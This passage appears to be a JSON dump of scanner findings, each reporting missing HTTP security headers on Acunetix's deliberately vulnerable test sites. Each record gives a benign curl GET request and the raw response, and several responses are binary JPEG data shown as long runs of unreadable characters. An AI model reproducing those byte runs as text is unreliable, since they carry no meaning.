</tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 993, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:46.636Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 994, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:47.017Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 995, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:47.366Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 996, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:47.690Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 997, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:47.970Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, 